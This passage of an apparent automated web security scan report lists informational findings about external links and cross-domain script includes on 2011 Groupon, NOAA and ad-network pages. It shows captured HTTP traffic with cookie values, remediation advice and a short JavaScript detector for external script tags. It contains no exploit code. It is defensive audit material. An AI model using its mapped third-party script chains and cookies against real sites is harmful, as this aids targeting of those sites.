<div class="UIImageBlock clearfix pas fbRecommendation RES_4abfe954b0c2cbdb"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Politics/2011/0503/Fed-up-with-Phoenix-Tucson-talks-secession-from-Arizona" title="Fed up with Phoenix, Tucson talks secession from Arizona" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/2011/0509-weekly/0509-afiftyone-arizona-tucson/10040192-1-eng-US/0509-AFIFTYONE-ARIZONA-TUCSON_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Politics/2011/0503/Fed-up-with-Phoenix-Tucson-talks-secession-from-Arizona" target="_top">Fed up with Phoenix, Tucson talks secession from Arizona</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1368d32d2146a078"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Latest-News-Wires/2011/0504/Geronimo-should-not-be-linked-to-Osama-say-American-Indians" title="Geronimo should not be linked to Osama, say American Indians" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0503_geronimo/10051709-1-eng-US/0503_Geronimo_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Latest-News-Wires/2011/0504/Geronimo-should-not-be-linked-to-Osama-say-American-Indians" target="_top">Geronimo should not be linked to Osama, say American Indians</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7441582ca3e36f4f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/World/Latest-News-Wires/2011/0503/Bin-Laden-wives-found-in-compound-one-used-as-human-shield" title="Bin Laden wives found in compound, one used as human shield" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0502_wives/10046189-1-eng-US/0502_Wives_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/World/Latest-News-Wires/2011/0503/Bin-Laden-wives-found-in-compound-one-used-as-human-shield" target="_top">Bin Laden wives found in compound, one used as human shield</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5cfafb05d881733c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Politics/2011/0505/9-11-families-to-Obama-Thank-you-for-doing-what-you-promised" title="9/11 families to Obama: &#039;Thank you for doing what you promised&#039;" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0505-awreath-obama-ground-zero/10061833-1-eng-US/0505-AWREATH-Obama-Ground-Zero_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Politics/2011/0505/9-11-families-to-Obama-Thank-you-for-doing-what-you-promised" target="_top">9/11 families to Obama: &#039;Thank you for doing what you promised&#039;</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4a533d38209fb22a"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/World/Asia-South-Central/2011/0502/Osama-bin-Laden-killed-near-Pakistan-s-West-Point.-Was-he-really-hidden" title="Osama bin Laden killed near Pakistan&#039;s West Point. Was he really hidden?" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0502-world-ohiding/10041921-1-eng-US/0502-world-ohiding_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/World/Asia-South-Central/2011/0502/Osama-bin-Laden-killed-near-Pakistan-s-West-Point.-Was-he-really-hidden" target="_top">Osama bin Laden killed near Pakistan&#039;s West Point. Was he really hidden?</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_31c7feb25cdc8884"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Science/2011/0505/In-tonight-s-meteor-shower-watch-falling-debris-from-Halley-s-Comet" title="In tonight&#039;s meteor shower, watch falling debris from Halley&#039;s Comet" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0505-meteor-shower/10060092-2-eng-US/0505-meteor-shower_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/Science/2011/0505/In-tonight-s-meteor-shower-watch-falling-debris-from-Halley-s-Comet" target="_top">In tonight&#039;s meteor shower, watch falling debris from Halley&#039;s Comet</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_634e0623b8413b81"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Business/Robert-Reich-s-Blog/2011/0429/The-oil-company-gusher" title="The oil company gusher" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0429-exxon/10032426-1-eng-US/0429-exxon_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/Business/Robert-Reich-s-Blog/2011/0429/The-oil-company-gusher" target="_top">The oil company gusher</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

17.33. http://www.groupon.com/subscriptions/new

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: referred_at=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=mbe; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: adchemy_id=q4; path=/
Set-Cookie: conversion_val=; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpcid=q4; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:34 GMT
Set-Cookie: b=fb20b364-7a51-11e0-a127-005056926ae9; path=/; expires=Sun, 09-May-2021 15:35:34 GMT
Set-Cookie: s=fb20c0ac-7a51-11e0-a127-005056926ae9; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=5ab241eb06d51f105c0c22a038766fce; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:34 GMT; HttpOnly
Status: 200
ETag: "52f175b7121fc6cae943527725d56424"
X-S-COOKIE: fb20c0ac-7a51-11e0-a127-005056926ae9
X-B-COOKIE: fb20b364-7a51-11e0-a127-005056926ae9
X-Runtime: 80
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...
<head>
<link href='http://assets1.grouponcdn.com/favicon.ico?rnb1Dk6i' rel='SHORTCUT ICON' />
<script type="text/javascript">
...[SNIP]...
<meta content='7829106395' property='fb:app_id' />
<link href="http://assets1.grouponcdn.com/stylesheets/app/landing/index.css?zm9BnoJf" media="screen" rel="stylesheet" type="text/css" />
<link href="http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_2s208.css?9SaOIwIc" media="screen" rel="stylesheet" type="text/css" />
<link href='/groupon.ico' rel='icon' />
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"></script>
...[SNIP]...
<div style='display:inline;'><img alt="?label=u-p3cpox4weq3al15qm&amp;script=0" border="0" height="0" src="http://www.googleadservices.com/pagead/conversion/1019040093/?label=U-p3CPOX4wEQ3aL15QM&amp;script=0" width="1" /></div>
...[SNIP]...
<div class='step'>
<img alt="Step 1 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_1.gif?UNq811WL" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Confirm_city" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/confirm_city.gif?4UuFdEOc" />
</div>
...[SNIP]...
<div class='step'>
<img alt="Step 2 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_2.gif?kNhmeTIh" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Enter_email" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/enter_email.gif?fyP2Y5Ml" />
</div>
...[SNIP]...
</form>
<img alt="Save 50% to 90% on Top-Rated Local Deals" class="save_three_steps_beneath disabled_on_submit" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/save_on_deals_small.gif?xK4VlDLG" />
</div>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?kWgEDV5U" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?1nuXIT24" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?-rDwJEm-" type="text/javascript"></script>
...[SNIP]...

17.34. http://www.groupon.com/subscriptions/new

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /subscriptions/new?division_p=dallas HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; visited=visit_1; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:19 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:19 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:19 GMT; HttpOnly
Status: 200
ETag: "ba29897db2cb6994cc7355c313e7987f"
X-Runtime: 78
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...
<head>
<link href='http://assets1.grouponcdn.com/favicon.ico?rnb1Dk6i' rel='SHORTCUT ICON' />
<script type="text/javascript">
...[SNIP]...
<meta content='7829106395' property='fb:app_id' />
<link href="http://assets1.grouponcdn.com/stylesheets/app/landing/index.css?zm9BnoJf" media="screen" rel="stylesheet" type="text/css" />
<link href="http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_two_steps7.css?yCo78ZCv" media="screen" rel="stylesheet" type="text/css" />
<link href='/groupon.ico' rel='icon' />
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"></script>
...[SNIP]...
<div style='display:inline;'><img alt="?label=u-p3cpox4weq3al15qm&amp;script=0" border="0" height="0" src="http://www.googleadservices.com/pagead/conversion/1019040093/?label=U-p3CPOX4wEQ3aL15QM&amp;script=0" width="1" /></div>
...[SNIP]...
</h1>
<img alt="Save 50% to 90% on Top-Rated Local Deals" class="save_three_steps" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/headline_3.gif?Ps-G-CLd" />
<div class='city_name'>
...[SNIP]...
<div class='step'>
<img alt="Step 1 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_1.gif?UNq811WL" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Confirm_city" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/confirm_city.gif?4UuFdEOc" />
</div>
...[SNIP]...
<div class='step'>
<img alt="Step 2 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_2.gif?kNhmeTIh" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Enter_email" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/enter_email.gif?fyP2Y5Ml" />
</div>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?kWgEDV5U" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?1nuXIT24" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?-rDwJEm-" type="text/javascript"></script>
...[SNIP]...

17.35. http://www.srh.noaa.gov/lmrfc/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /lmrfc/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /lmrfc/?n=lmrfc-mississippiandohioriverforecast HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 17853
Content-Type: text/html; charset=UTF-8
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=utf-8" />
<link rel="schema.DC" href="http://purl.org/dc/elements/1.1/" /><title>
...[SNIP]...
<div class="aligncenter"><a href="http://www.weather.gov/" class="wxlink">weather.gov</a>
...[SNIP]...
<li><a href="http://www.weather.gov/pa/">News</a></li>
<li><a href="http://weather.gov/organization.php">Organization</a>
...[SNIP]...
<li>
           <a href="http://www.weather.gov/rss/"><img src="/images/xml.gif" alt="RSS Feeds" title="RSS Feeds" width="36" height="14" class="img" />
...[SNIP]...
<li><a href="http://water.weather.gov/precip" title="Observed Precip">Observed Precip</a>
...[SNIP]...
<li><a href="http://radar.weather.gov/Conus/index.php" title="Radar">Radar</a>
...[SNIP]...
<li><a href="http://www.drought.gov/portal/server.pt" title="Nat'l Drought Info">Nat'l Drought Info</a>
...[SNIP]...
<font face="Verdana, Arial, Helvetica, sans-serif"><a href="http://water.weather.gov/ahps2/river.php?wfo=pah&amp;wfoid=18785&amp;riverid=203833&amp;view=1,1,1,1,1,1,1,1&amp;toggles=10,7,8,2,9,15,6&amp;pt[]=144108&amp;pt[]=141463&amp;pt[]=141839&amp;pt[]=143934&amp;pt[]=141618&amp;pt[]=146423&amp;pt[]=143366&amp;pt[]=142172&amp;pt[]=141493&amp;pt[]=142940&amp;pt[]=144619&amp;pt[]=144798&amp;pt[]=144609&amp;pt[]=141308&amp;pt[]=144449&amp;pt[]=143828&amp;pt[]=142711&amp;allpoints=143846,142736,143816,143998,145144,142659,142234,145887,144081,142375,143866,141506,142962,143885,143323,144201,144542,142873,143260,143099,142560,144186,143177,142054,143945,144055,141370,143630,141931,142812,141676,142534,144568,143535,144589,143030,144031,143079,144282,141445,141722,141383,143445,143646,143787,143574,143545,142773,141629,144517,142500,143196,142105,142509,142418,144108,141463,141839,143934,141618,146423,143366,142172,141493,142940,144619,144798,144609,141308,144449,143828,142711&amp;data[]=hydrograph&amp;submit=Make+my+River+Page!">Mississippi River Hydrographs</a>
...[SNIP]...
<font face="Verdana, Arial, Helvetica, sans-serif"><a href="http://water.weather.gov/ahps2/river.php?wfo=lmk&amp;wfoid=18699&amp;riverid=204624&amp;view=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1&amp;toggles=&amp;pt%5B%5D=143995&amp;pt%5B%5D=143371&amp;pt%5B%5D=141372&amp;pt%5B%5D=141907&amp;pt%5B%5D=143683&amp;allpoints=141893%2C143063%2C144287%2C142160%2C145137%2C143614%2C141268%2C144395%2C143843%2C142481%2C143607%2C145086%2C142497%2C141266%2C145247%2C143025%2C142896%2C144670%2C145264%2C144035%2C143875%2C143847%2C142264%2C143602%2C144126%2C146318%2C141608%2C144451%2C144523%2C144877%2C142935%2C142195%2C146116%2C143151%2C142437%2C142855%2C142537%2C142598%2C143203%2C143868%2C144676%2C143954%2C143995%2C143371%2C141372%2C141907%2C143683&amp;data%5B%5D=hydrograph&amp;submit=Make%2Bmy%2BRiver%2BPage%21">Ohio River Hydrographs</a>
...[SNIP]...
<li><a href="http://www.weather.gov/disclaimer.php">Disclaimer</a>
...[SNIP]...
<li><a href="http://www.weather.gov/credits.php">Credits</a></li>
<li><a href="http://www.weather.gov/glossary/">Glossary</a>
...[SNIP]...
<li><a href="http://www.weather.gov/privacy.php">Privacy Policy</a>
...[SNIP]...
<li><a href="http://www.weather.gov/admin.php">About Us</a></li>
<li><a href="http://www.weather.gov/careers.php">Career Opportunities</a>
...[SNIP]...

18. Cross-domain script include
There are 51 instances of this issue:

Issue background

When an application includes a script from an external domain, the browser executes that script within the security context (origin) of the invoking page, not the origin it was fetched from. The same-origin policy therefore offers no protection: the script can do anything the application's own scripts can do, such as reading application data, cookies that are not HttpOnly and form contents, and performing actions as the current user.

Including a script from an external domain means trusting that domain with the data and functionality of your application, and trusting that domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application. The trust is transitive: a third-party script can itself write further script tags, so the page ends up trusting every domain in the chain (the ad responses in 18.1 and 18.2 below show one such chain, with a single include pulling in scripts from adxpose.com, atdmt.com and c3metrics.com). Where the include is fetched over plain HTTP, as every script in this section is, an attacker on the network path can also substitute the script without compromising the third party at all.

Issue remediation

Scripts should not be included from untrusted domains. If a third-party script fulfils a genuine requirement, the preferred fix is to copy its contents onto your own domain and include it from there, so that the served code is under your own change control. If that is not possible (for example for licensing reasons, or because the script is generated per request, as the ad-network responses in 18.1 and 18.2 are), consider reimplementing the script's functionality within your own code. Where a static script must remain on the external host, serve it over HTTPS and add a Subresource Integrity (integrity) attribute so that the browser rejects a copy whose content has changed; note that this cannot be applied to scripts whose content legitimately differs on every request.
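The following is an added example and is not code from this report or from Burp Suite. It re-implements the check that produced the findings in this section: pull every script include out of a captured response, resolve it against the page URL, and flag those served by another host, also recording whether the tag carries an integrity attribute. The sample HTML is constructed (modelled on the Groupon response in 17.34, not copied from it), and the function names are mine. It assumes Node.js with the built-in URL class.

```javascript
// Added example, not code from the XSS.CX report or from Burp Suite: a
// minimal re-implementation of the "cross-domain script include" check that
// produced the findings in section 18. Function and sample names are mine.

// Constructed sample modelled on the Groupon response in 17.34 (not a
// verbatim copy): two scripts from ajax.googleapis.com (one of them
// protocol-relative), one from the grouponcdn.com asset host, one local
// script, one inline script and one external script that carries an SRI
// integrity attribute.
const SAMPLE_HTML = `
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?kWgEDV5U" type="text/javascript"></script>
<script src="/javascripts/app/local.js"></script>
<script type="text/javascript">var inline = 1;</script>
<script src='https://cdn.example.net/lib.js' integrity="sha384-AAAA" crossorigin="anonymous"></script>
`;

// Read one attribute from a single opening tag. Handles double-quoted,
// single-quoted and unquoted values; returns null when absent. Only the
// &amp; entity is decoded, which is enough for URLs in a scanner heuristic.
function readAttr(tag, name) {
  const re = new RegExp(
    "\\s" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = re.exec(tag);
  if (!m) return null;
  const raw = m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3];
  return raw.replace(/&amp;/g, "&");
}

// Collect every <script> opening tag that has a src attribute. A regex is
// adequate for captured, well-formed responses like the ones in this report;
// an HTML parser is the right tool for adversarial input.
function parseScriptIncludes(html) {
  const includes = [];
  const tagRe = /<script\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = readAttr(m[0], "src");
    if (src === null) continue; // inline script, not an include
    includes.push({ src: src, integrity: readAttr(m[0], "integrity") });
  }
  return includes;
}

// Resolve each src against the page URL (so relative and protocol-relative
// references are handled) and keep those served by a different host.
// Comparing hostnames is stricter than the scanner's "other domain" wording:
// a sub-domain of the page's own site is flagged too. Deciding "same site"
// properly needs a public-suffix list, which is deliberately not included.
function findCrossDomainScripts(pageUrl, html) {
  const page = new URL(pageUrl);
  const findings = [];
  for (const inc of parseScriptIncludes(html)) {
    let target;
    try {
      target = new URL(inc.src, page);
    } catch (e) {
      continue; // unparsable src; skip rather than guess
    }
    // Only network-fetched scripts are includes; javascript:/data: URLs
    // are a different class of problem and are not reported here.
    if (target.protocol !== "http:" && target.protocol !== "https:") continue;
    if (target.hostname === page.hostname) continue;
    findings.push({
      src: inc.src,
      resolved: target.href,
      hasIntegrity: inc.integrity !== null && inc.integrity.trim() !== "",
    });
  }
  return findings;
}

if (typeof require !== "undefined" && require.main === module) {
  const pageUrl = "http://www.groupon.com/subscriptions/new?division_p=dallas";
  for (const f of findCrossDomainScripts(pageUrl, SAMPLE_HTML)) {
    console.log((f.hasIntegrity ? "pinned  " : "UNPINNED") + " " + f.resolved);
  }
}
```

Run against the sample it reports four cross-domain includes, three of them without an integrity attribute; the local script and the inline script are ignored. The hostname comparison is intentionally simple: treating assets1.grouponcdn.com as "another domain" matches the report, but a sub-domain of the page's own site would also be listed, which is usually what you want when auditing who can run code in the page.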


18.1. http://ad.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=27888134820386770&clkurl=http://ib.adnxs.com/click/AQAAAAAA_D8AAAAAAAD8PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQJ41jpUnrNkrSsYda6b2ziXpCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04A9gUBAgUCAAQAAAAAbxbN4QAAAAA./cnd=!7hJ17Ai_kAMQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBXt6i6QnITcO4EKXvlQfzjoStCNfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gC1g3AAgTIAoXSzwrgAgDqAg4zMDB4MjUwQl9Nb25leagDAegDa-gDkwXoA5gD6AOLCegDjAn1AwIEAET1AyAAAADgBAGABunEhfTFkNaJMg%26num%3D1%26sig%3DAGiWqtzXujmj6x9ljlxi_jlsMLM-st1i2A%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
